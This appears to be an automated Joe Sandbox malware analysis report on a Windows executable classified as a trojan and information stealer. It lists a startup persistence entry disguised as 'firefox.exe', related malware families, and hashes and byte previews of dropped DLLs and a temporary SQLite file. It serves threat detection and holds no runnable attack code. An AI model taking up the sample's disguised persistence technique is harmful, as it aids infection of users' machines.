IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587904
Start date and time:	2025-01-10 19:11:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jd4t3R7hOq.exe renamed because original name is a hash value
Original Sample Name:	83eaae959cb35cd1d132562c7d49285abedce511c9f28244894aba725ebffe58.exe
Detection:	MAL
Classification:	mal100.spre.phis.troj.adwa.spyw.evad.winEXE@18/60@1/2
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 99% Number of executed functions: 127 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 172.202.163.200, 13.85.23.206
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6912 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7672 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:12:23	API Interceptor	13x Sleep call for process: powershell.exe modified
13:12:24	API Interceptor	2x Sleep call for process: svchost.exe modified
19:12:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	Voicemail_+Transcription+_ATT006151.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	104.21.28.65
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	104.21.48.233
	https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal	Get hash	malicious	Unknown	Browse	104.17.25.14
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-console-l1-1-0.dll	3861227PDF.exe	Get hash	malicious	AZORult	Browse
	WC10SCPMaX.exe	Get hash	malicious	Azorult, GuLoader	Browse
	7000091945.xlsx.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Dekont#400577_89008_96634.exe	Get hash	malicious	Azorult, GuLoader	Browse
	No. 1349240400713.exe	Get hash	malicious	Azorult, GuLoader	Browse
	PRICE ENQUIRY - RFQ 6000073650.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Payment.cmd	Get hash	malicious	Azorult, DBatLoader	Browse
	Order160311_Reference.hta	Get hash	malicious	Azorult	Browse
	Refrence-Order#63729.pdf	Get hash	malicious	Azorult	Browse
	Order-63729_Reference.bat	Get hash	malicious	Azorult	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8008316115349753
Encrypted:	false
SSDEEP:	1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5Tb:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBfk
MD5:	F49564A672E714160E7A3AE9359C7037
SHA1:	F7CA34FDD620B66B124BCF4DB85E05230A584018
SHA-256:	623B6B11D0092FAF1C6177506299C8A3DADAE6B64BD72B9C5EAE49DB39F51E92
SHA-512:	E45DAA24742CEA6C11294049D8C4EB27E8DFC0C56977223A43C51F555B41B21E9E2B8A449758470D1FDECA772B16C8B8ECCC1D8D022C5C11AD1D3B9EEA374397
Malicious:	false
Reputation:	low
Preview:	dg".........@..@%9...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................T.....#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe98a1254, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7715429462322415
Encrypted:	false
SSDEEP:	1536:TSB2ESB2SSjlK/7vqlC06Z546I50AEzJ+Ykr3g16XWq2UPkLk+kFLKho38o38+W6:Taza9vqcHbrq2UyUVWlW
MD5:	0689AA779357F581D706D30775B9C58A
SHA1:	F0CA42EF207DA8FEF1833834BD00EA03E7DCC20D
SHA-256:	9C38F861326D879B0290BC4B80ED4A2DDDB7626C4B8A3C9E722B814F227C9E2B
SHA-512:	C570B1E75AB05C03F03BF42A52ED3534A537BB46D23AC3F58D9FACF8AADC02C53F1F186BF81A7154C3DD1FE3C07F861B2C5F38A2ED600562205EE60888D6EE83
Malicious:	false
Preview:	..T... ...............X\...;...{......................0.p.....#....{.......}q.h.r.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......%9...{...............................................................................................................................................................................................2...{...................................d:......}..................i.Ll.....}q..........................#......h.r.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08156245199696815
Encrypted:	false
SSDEEP:	3:B9lyYeKZvkYUvel08qrrvr+gvrr/apJzk5vwllVmctlll/Sm1l1:HlyzkvkUlrgn/anIyLPPv
MD5:	DB40EEC7EF3DBCA581D800513AC1D814
SHA1:	06EB5A3BB4AF11F67F4954F9C79F977186AC844E
SHA-256:	890FC87A7FBBA4CB7590339448E3908323302F5A0F823CDEDE0CA118FAC67891
SHA-512:	E678F0CA9795308794EA7805F9C772EDA64F691DFEF724C37C7CD9306D844CE427C3373EEE065C6E033E6ABE5D2298F57CF107D0DEF8CA8B8AE12E4A83AD27D8
Malicious:	false
Preview:	..>3.....................................;...{.......}q.#....{..........#....{..#....{...i..#....{.V................i.Ll.....}q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.369760756950919
Encrypted:	false
SSDEEP:	24:3vP/4WSKco4KmZjKbm51s4RPT6moUebIKo+mZ9tXt/NK3R8UHr2:gWSU4xymI4RfoUeW+mZ9tlNWR8Wi
MD5:	F60BA73C0568B049187B90950EA87FBC
SHA1:	89B3CE14F9D478C53BEBC36DD0D8366AA78A36B6
SHA-256:	A0B65E5E65D3B3020D72B3E32DCF0F427BAC42C2361854518291689B72F2C6D8
SHA-512:	60F0B24948D8CB0DB529D90718C3C10121993115E7401C71B3204FDC57CEF5E15BF84ECB824C378A5E86BFD946263E5488023610EB4BAA0D8B21E86BF37B3185
Malicious:	false
Preview:	@...e.................................@..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\4204906443976354681473.tmp

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.080160932980843
Encrypted:	false
SSDEEP:	192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
MD5:	502263C56F931DF8440D7FD2FA7B7C00
SHA1:	523A3D7C3F4491E67FC710575D8E23314DB2C1A2
SHA-256:	94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
SHA-512:	633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 3861227PDF.exe, Detection: malicious, Browse Filename: WC10SCPMaX.exe, Detection: malicious, Browse Filename: 7000091945.xlsx.exe, Detection: malicious, Browse Filename: Dekont#400577_89008_96634.exe, Detection: malicious, Browse Filename: No. 1349240400713.exe, Detection: malicious, Browse Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious, Browse Filename: Payment.cmd, Detection: malicious, Browse Filename: Order160311_Reference.hta, Detection: malicious, Browse Filename: Refrence-Order#63729.pdf, Detection: malicious, Browse Filename: Order-63729_Reference.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.093995452106596
Encrypted:	false
SSDEEP:	192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
MD5:	CB978304B79EF53962408C611DFB20F5
SHA1:	ECA42F7754FB0017E86D50D507674981F80BC0B9
SHA-256:	90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
SHA-512:	369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1028816880814265
Encrypted:	false
SSDEEP:	384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
MD5:	88FF191FD8648099592ED28EE6C442A5
SHA1:	6A4F818B53606A5602C609EC343974C2103BC9CC
SHA-256:	C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
SHA-512:	942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...\|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.126358371711227
Encrypted:	false
SSDEEP:	192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
MD5:	6D778E83F74A4C7FE4C077DC279F6867
SHA1:	F5D9CF848F79A57F690DA9841C209B4837C2E6C3
SHA-256:	A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
SHA-512:	02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21816
Entropy (8bit):	7.014255619395433
Encrypted:	false
SSDEEP:	384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
MD5:	94AE25C7A5497CA0BE6882A00644CA64
SHA1:	F7AC28BBC47E46485025A51EEB6C304B70CEE215
SHA-256:	7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
SHA-512:	83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d......................g..................U...................M...

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
